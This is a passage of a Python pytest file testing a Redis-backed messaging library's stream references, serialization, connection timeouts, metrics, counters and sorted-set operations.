def test_reference_create_from_stream_single_key(self, caller):
caller, caller_name = caller
stream_name = "test_ref"
stream_data = {"data": b"test reference!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
ref_data = caller.reference_get(key_dict["data"])[0]
assert ref_data == stream_data["data"]
success, failed = caller.reference_delete(key_dict["data"])
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_legacy_serialization(
self, caller
):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": {"nested1": "val1"}, "key2": {"nested2": "val2"}}
orig_stream_data = copy.deepcopy(stream_data)
caller.entry_write(stream_name, stream_data, serialize=True)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key], deserialize=True)[0]
assert ref_data == orig_stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_arrow(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": {"nested1": "val1"}, "key2": {"nested2": "val2"}}
orig_stream_data = copy.deepcopy(stream_data)
caller.entry_write(stream_name, stream_data, serialization="arrow")
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == orig_stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_persist(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
assert caller.reference_get_timeout_ms(key_dict[key]) == -1
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_timeout(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=500
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == stream_data[key]
time.sleep(0.5)
for key in key_dict:
assert caller.reference_get(key_dict[key])[0] is None
def test_reference_create_from_stream_multiple_keys_latest(self, caller):
caller, caller_name = caller
def get_data(i):
return {"key1": f"value {i}!", "key2": f"value {i}!"}
stream_name = "test_ref_multiple_keys"
# Write all of the keys and get IDs back
ids = []
for i in range(10):
stream_data = get_data(i)
ids.append(
caller.entry_write(stream_name, stream_data, serialization="msgpack")
)
# Check that we can get each of them individually
for i, id_val in enumerate(ids):
# Make the reference to the particular ID
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, stream_id=id_val, timeout_ms=0
)
# Loop over the references and check the data
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
correct_data = get_data(i)
assert ref_data == correct_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
# Now, check the final piece and make sure it's the most recent
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
# Loop over the references and check the data
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
correct_data = get_data(9)
assert ref_data == correct_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_entry_read_n_ignore_serialization(self, caller):
caller, caller_name = caller
test_data = {"some_key": "some_val"}
caller.entry_write("test_stream", {"data": test_data}, serialization="msgpack")
entries = caller.entry_read_n(
caller_name, "test_stream", 1, serialization=None, force_serialization=True
)
assert test_data == unpackb(entries[0]["data"], raw=False)
def test_entry_read_since_ignore_serialization(self, caller):
caller, caller_name = caller
test_data_1 = {"some_key": "some_val"}
test_data_2 = {"some_other_key": "some_other_val"}
data_1_id = caller.entry_write(
"test_stream", {"data": test_data_1}, serialization="msgpack"
)
caller.entry_write(
"test_stream", {"data": test_data_2}, serialization="msgpack"
)
entries = caller.entry_read_since(
caller_name,
"test_stream",
last_id=data_1_id,
serialization=None,
force_serialization=True,
)
assert test_data_2 == unpackb(entries[0]["data"], raw=False)
def test_reference_ignore_serialization(self, caller):
caller, caller_name = caller
data = [
{"hello": "world", "atom": 123456, "some_obj": {"references": "are fun!"}},
True,
]
ref_ids = caller.reference_create(*data, serialization="msgpack")
ref_data = caller.reference_get(
*ref_ids, serialization=None, force_serialization=True
)
for i in range(len(data)):
assert unpackb(ref_data[i], raw=False) == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_command_response_wrong_n_workers(self, caller, responder):
"""
        Passing an invalid worker count to command_loop should raise a
        ValueError instead of starting the response loop.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
        # an invalid worker count should make command_loop raise immediately rather than block
with pytest.raises(ValueError):
responder.command_loop(n_workers=-1)
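    # 10.255.255.1 is typically non-routable, so the connection attempt below
    # should hang until conn_timeout_ms (2 s) elapses and then raise
    # ElementConnectionTimeoutError.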
def test_timeout_ms(self):
then = time.time()
with pytest.raises(ElementConnectionTimeoutError):
e = self._element_create(
"timeout-element-1", host="10.255.255.1", conn_timeout_ms=2000
)
assert e._redis_connection_timeout == 2.0
e._rclient.keys()
now = time.time()
diff = now - then
assert int(round(diff, 2)) == 2
def test_metrics_create_basic(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.retention_msecs == 10000
def test_metrics_create_label(self, caller, metrics):
caller, caller_name = caller
label_dict = {"single": "label"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
def test_metrics_create_labels(self, caller, metrics):
caller, caller_name = caller
label_dict = {"label1": "hello", "label2": "world"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
def test_validate_metrics_labels_enforced(self, caller, metrics):
enforced = False
caller, caller_name = caller
label_dict = {"label1": "", "label2": "valid"}
try:
caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_create_rule(self, caller, metrics):
caller, caller_name = caller
rules = [("sum", 10000, 200000)]
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules
)
assert data == "some_metric"
data = metrics.info("some_metric")
print(data.rules)
assert len(data.rules) == 1
assert data.rules[0][0] == b"some_metric_SUM_10000"
assert data.rules[0][1] == 10000
assert data.rules[0][2] == b"SUM"
data = metrics.info("some_metric_SUM_10000")
assert data.retention_msecs == 200000
def test_metrics_create_rules(self, caller, metrics):
caller, caller_name = caller
rules = [
("sum", 10000, 200000),
("avg", 86400, 604800),
]
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert len(data.rules) == 2
sum_idx = 0 if data.rules[0][0] == b"some_metric_SUM_10000" else 1
avg_idx = 1 if sum_idx == 0 else 0
assert data.rules[sum_idx][0] == b"some_metric_SUM_10000"
assert data.rules[sum_idx][1] == 10000
assert data.rules[sum_idx][2] == b"SUM"
assert data.rules[avg_idx][0] == b"some_metric_AVG_86400"
assert data.rules[avg_idx][1] == 86400
assert data.rules[avg_idx][2] == b"AVG"
data = metrics.info("some_metric_SUM_10000")
assert data.retention_msecs == 200000
data = metrics.info("some_metric_AVG_86400")
assert data.retention_msecs == 604800
def test_metrics_create_already_created(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
def test_metrics_create_update(self, caller, metrics):
caller, caller_name = caller
rules = [
("sum", 10000, 200000),
("avg", 86400, 604800),
]
label_dict = {"label1": "hello", "label2": "world"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules, labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
assert len(data.rules) == 2
sum_idx = 0 if data.rules[0][0] == b"some_metric_SUM_10000" else 1
avg_idx = 1 if sum_idx == 0 else 0
assert data.rules[sum_idx][0] == b"some_metric_SUM_10000"
assert data.rules[sum_idx][1] == 10000
assert data.rules[sum_idx][2] == b"SUM"
assert data.rules[avg_idx][0] == b"some_metric_AVG_86400"
assert data.rules[avg_idx][1] == 86400
assert data.rules[avg_idx][2] == b"AVG"
data = caller.metrics_create_custom(
MetricsLevel.INFO,
"some_metric",
rules=rules,
labels=label_dict,
update=True,
)
assert data == "some_metric"
rules = [
("min", 6000, 1000),
("max", 5000, 10000),
]
label_dict = {"label1": "elementary", "label2": "robotics"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules, labels=label_dict
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO,
"some_metric",
rules=rules,
labels=label_dict,
update=True,
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
assert len(data.rules) == 2
max_idx = 0 if data.rules[0][0] == b"some_metric_MAX_5000" else 1
min_idx = 1 if max_idx == 0 else 0
assert data.rules[max_idx][0] == b"some_metric_MAX_5000"
assert data.rules[max_idx][1] == 5000
assert data.rules[max_idx][2] == b"MAX"
assert data.rules[min_idx][0] == b"some_metric_MIN_6000"
assert data.rules[min_idx][1] == 6000
assert data.rules[min_idx][2] == b"MIN"
def test_metrics_add(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42)
print(data)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
# make a metric and have the timestamp auto-created
data = metrics.get("some_metric")
assert data[1] == 42
# Make sure the auto-generated timestamp is within 1s of the unix time
assert (time.time() * 1000) - data[0] <= 1000
def test_metrics_add_set_timestamp_int(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=1)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
        # read the sample back and check the explicit timestamp
data = metrics.get("some_metric")
assert data[1] == 42
assert data[0] == 1
def test_metrics_add_set_timestamp_time(self, caller, metrics):
caller, caller_name = caller
curr_time = int(time.time() * 1000)
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=curr_time)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
        # read the sample back and check the explicit timestamp
data = metrics.get("some_metric")
assert data[1] == 42
assert data[0] == curr_time
def test_metrics_add_multiple(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
time.sleep(0.001)
data = caller.metrics_add("some_metric", 2020)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
        # read both samples back in order
data = metrics.range("some_metric", 1, -1)
assert data[0][1] == 42
assert data[1][1] == 2020
def test_metrics_add_multiple_handle_same_timestamp(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=1234)
assert len(data) == 1 and type(data[0]) == list and data[0][0] == 1234
data = caller.metrics_add("some_metric", 2020, timestamp=1234)
assert len(data) == 1 and type(data[0]) == list and data[0][0] == 1234
# Behavior should be update
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1
# Default behavior is MAX
assert data[0][1] == 2020
assert data[0][0] == 1234
def test_metrics_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
data = metrics.get("some_metric")
assert data == (0, 0)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
data = metrics.get("some_metric")
assert type(data[0]) == int and data[1] == 42
def test_metrics_add_multiple_simultaneous(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_other_metric", retention=10000
)
assert data == "some_other_metric"
data = caller.metrics_add("some_metric", 42)
assert data is not None
data = caller.metrics_add("some_other_metric", 2020)
assert data is not None
        # read each metric back
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 42
data = metrics.range("some_other_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 2020
def test_metrics_add_multiple_simultaneous_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_other_metric", retention=10000
)
assert data == "some_other_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
data = caller.metrics_add("some_other_metric", 2020, pipeline=pipeline)
assert data is None
time.sleep(0.001)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
        # read each metric back after the pipeline flush
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 42
data = metrics.range("some_other_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 2020
def test_metrics_add_multiple_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
time.sleep(0.001)
data = caller.metrics_add("some_metric", 2020, pipeline=pipeline)
assert data is None
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
        # read both samples back after the pipeline flush
data = metrics.range("some_metric", 1, -1)
assert len(data) == 2 and data[0][1] == 42 and data[1][1] == 2020
def test_metrics_add_multiple_async_handle_same_timestamp(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, timestamp=1234, pipeline=pipeline)
assert data is None
data = caller.metrics_add(
"some_metric", 2020, timestamp=1234, pipeline=pipeline
)
assert data is None
data = metrics.get("some_metric")
assert data == (0, 0)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
        # read the samples back after the pipeline flush
data = metrics.range("some_metric", 1, -1)
# There's a super-slim chance this makes it through if the
# calls are on a millisecond boundary
assert len(data) == 1 or (len(data) == 2)
# If there's only one piece of data, behavior should be MAX by default
if len(data) == 1:
assert data[0][1] == 2020
else:
assert data[0][1] == 42
assert data[1][1] == 2020
def test_metrics_async_timestamp_no_jitter(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
add_time = time.time()
data = metrics.get("some_metric")
assert data == (0, 0)
time.sleep(2.0)
flush_time = time.time()
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
data = metrics.get("some_metric")
assert data[1] == 42
        # Make sure the timestamp reflects the add and not the flush,
        # i.e. pipeline buffering does not jitter it
assert (int(1000 * add_time) - data[0]) <= 1000
assert (int(1000 * flush_time) - data[0]) >= 1900
def test_metrics_remote(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_host="127.0.0.1", metrics_port=6380
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
my_elem._clean_up()
def test_metrics_remote_nonexist(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_host="127.0.0.1", metrics_port=6381
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
my_elem._clean_up()
def test_metrics_remote_nonexist_enforced(self, caller, metrics):
enforced = False
try:
Element(
"test_metrics_no_redis",
metrics_host="127.0.0.1",
metrics_port=6381,
enforce_metrics=True,
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_socket_nonexist(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_socket_path="/shared/nonexistent.sock"
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
my_elem._clean_up()
def test_metrics_socket_nonexist_enforced(self, caller, metrics):
enforced = False
try:
Element(
"test_metrics_no_redis",
metrics_socket_path="/shared/nonexistent.sock",
enforce_metrics=True,
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_turned_off(self, caller, metrics):
os.environ["ATOM_USE_METRICS"] = "FALSE"
my_elem = Element("test_metrics_turned_off")
assert my_elem is not None
pipeline = my_elem.metrics_get_pipeline()
assert pipeline is None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
data = my_elem.metrics_add("some_metric", 42)
assert data is None
data = my_elem.metrics_write_pipeline(pipeline)
assert data is None
my_elem._clean_up()
def test_counter_set(self, caller):
caller, caller_name = caller
for i in range(10):
counter_val = caller.counter_set("some_counter", i)
assert counter_val == i
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_get(self, caller):
caller, caller_name = caller
for i in range(10):
counter_val = caller.counter_set("some_counter", i)
assert counter_val == i
assert caller.counter_get("some_counter") == i
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_delete(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", 32)
assert counter_val == 32
assert caller.counter_get("some_counter") == 32
success = caller.counter_delete("some_counter")
assert success == True
assert caller.counter_get("some_counter") is None
def test_counter_update(self, caller):
caller, caller_name = caller
counter_sum = 0
for i in range(20):
# Test 10 positive and 10 negative numbers
rand_val = random.randint(0, 1000)
if i % 2 == 0:
rand_val *= -1
# Add the value to the sum
counter_sum += rand_val
# Update the counter
counter_val = caller.counter_update("some_counter", rand_val)
# Make sure our sum matches the counter's
assert counter_sum == counter_val
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_set_update(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", 40)
assert counter_val == 40
counter_val = caller.counter_update("some_counter", 2)
assert counter_val == 42
counter_val = caller.counter_update("some_counter", 0)
assert counter_val == 42
counter_val = caller.counter_update("some_counter", -1)
assert counter_val == 41
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_expire(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", -27, timeout_ms=50)
assert counter_val == -27
time.sleep(0.1)
counter_val = caller.counter_get("some_counter")
assert counter_val is None
def test_multiple_counters(self, caller):
caller, caller_name = caller
counter1_sum = 0
counter2_sum = 0
for i in range(20):
# Test 10 positive and 10 negative numbers
rand_val_1 = random.randint(0, 1000)
rand_val_2 = random.randint(0, 1000)
if i % 2 == 0:
rand_val_1 *= -1
rand_val_2 *= -1
# Add the value to the sum
counter1_sum += rand_val_1
counter2_sum += rand_val_2
# Update the counter
counter1_val = caller.counter_update("some_counter1", rand_val_1)
assert counter1_sum == counter1_val
counter2_val = caller.counter_update("some_counter2", rand_val_2)
assert counter2_sum == counter2_val
success = caller.counter_delete("some_counter1")
assert success == True
success = caller.counter_delete("some_counter2")
assert success == True
def test_counter_set_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_set("some_counter", 0)
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_update_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_update("some_counter", 1)
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_get_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
caller.counter_set("some_counter", 239829)
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_get("some_counter")
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_delete_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_set("some_counter", i)
success = caller.counter_delete("some_counter")
assert success == True
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
def test_set_add(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
value = caller.sorted_set_read("some_set", member)
assert value == i
caller.sorted_set_delete("some_set")
def test_set_size(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = f"key{i}"
add_cardinality = caller.sorted_set_add("some_set", member, i)
size_cardinality = caller.sorted_set_size("some_set")
assert add_cardinality == size_cardinality
caller.sorted_set_delete("some_set")
def test_set_size_no_set(self, caller):
caller, caller_name = caller
size = caller.sorted_set_size("some_set")
assert size == 0
def test_set_update(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = "same_value"
caller.sorted_set_add("some_set", member, i)
value = caller.sorted_set_read("some_set", member)
assert value == i
caller.sorted_set_delete("some_set")
def test_set_range_min_withvalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_min_slice_withvalues(self, caller):
caller, caller_name = caller
values = []
slice_start = 3
slice_end = 5
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
if i >= slice_start and i <= slice_end:
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", slice_start, slice_end)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_min_novalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append(member.encode("utf-8"))
set_range = caller.sorted_set_range("some_set", 0, -1, withvalues=False)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_withvalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_slice_withvalues(self, caller):
caller, caller_name = caller
values = []
slice_start = 1
slice_end = 7
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
if i <= (n_items - 1 - slice_start) and i >= (n_items - 1 - slice_end):
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range(
"some_set", slice_start, slice_end, maximum=True
)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_novalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, member.encode("utf-8"))
set_range = caller.sorted_set_range(
"some_set", 0, -1, maximum=True, withvalues=False
)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_pop_min(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop("some_set")
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_min_blocking(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop(
"some_set", block=True, timeout=0.1
)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_no_exist(self, caller):
caller, caller_name = caller
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set")
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_no_exist_blocking(self, caller):
caller, caller_name = caller
passed = False
block_time = 0.1
start_time = time.time()
try:
pop_val, cardinality = caller.sorted_set_pop(
"some_set", block=True, timeout=block_time
)
except SetEmptyError:
passed = True
end_time = time.time()
assert passed == True
assert end_time - start_time >= block_time
# No delete -- set disappears on its own when final member popped
def test_set_pop_empty(self, caller):
caller, caller_name = caller
cardinality = caller.sorted_set_add("some_set", "member", 23)
assert cardinality == 1
pop_val, cardinality = caller.sorted_set_pop("some_set")
assert pop_val == (b"member", 23)
assert cardinality == 0
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set")
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_max(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_blocking(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop(
"some_set", maximum=True, block=True, timeout=0.1
)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_no_exist(self, caller):
caller, caller_name = caller
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_no_exist_blocking(self, caller):
caller, caller_name = caller
passed = False
block_time = 1.0
start_time = time.time()
try:
pop_val, cardinality = caller.sorted_set_pop(
"some_set", maximum=True, block=True, timeout=block_time
)
except SetEmptyError:
passed = True
end_time = time.time()
assert passed == True
assert end_time - start_time >= block_time
